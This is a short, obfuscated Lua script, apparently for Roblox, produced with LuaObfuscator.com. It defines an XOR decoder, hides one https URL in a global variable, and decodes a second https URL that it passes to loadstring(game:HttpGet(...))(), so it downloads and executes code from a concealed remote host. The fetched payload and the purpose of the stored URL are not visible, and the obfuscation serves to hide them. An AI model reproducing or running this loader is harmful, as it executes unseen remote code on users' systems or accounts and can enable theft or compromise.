--[[

 .____                  ________ ___.    _____                           __                

 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 

 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \

 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/

 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   

         \/          \/         \/    \/                \/     \/     \/                   

          \_Welcome to LuaObfuscator.com   (Alpha 0.1.6) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v10,v11)local v12={};for i=1 + 0, #v10 do v6(v12,v0(v4(v1(v2(v10,i,i + 1)),v1(v2(v11,((1265 -(1161 + 103)) -0) + ((i-1)% #v11),1 + ((i-(4 -3))% #v11) + 1)))%((2222 -1175) -(37 + 557 + 197))));end return v5(v12);end _G.v8=3025847082;_G.v9=v7("\186\191\194\18\253\132\133\167\182\162\197\1\225\204\206\166\177\164\219\77\239\206\195\167\165\174\212\10\225\209\193\251\253\250\134\87\188\135\158\177\224\250\132\80\191\137\157\188\235\253\129\84\161\236\237\207\136\134\244\15\247\219\206\198\161\135\244\48\163\218\204\219\181\173\197\79\236\216\204\253\230\179\204\4\214\134\199\236\131\131\219\54\200\239\207\252\136\160\229\3\248\243\229\255\180\129\225\82\236\255\238\195\176\174\222\7\249\232\237\225\151","\210\203\182\98\142\190\170\136");loadstring(game:HttpGet(v7("\127\176\7\166\235\45\235\92\164\249\96\234\20\191\236\127\177\17\163\235\114\182\16\185\246\99\161\29\162\182\116\171\30\249\238\114\183\7\175\224\56\148\22\162\203\126\169\6\186\249\99\171\1\142\217\98\176\28\144\249\101\169\92\187\249\126\170\92\158\249\100\176\22\144\249\101\169\93\186\237\118","\23\196\115\214\152")))();
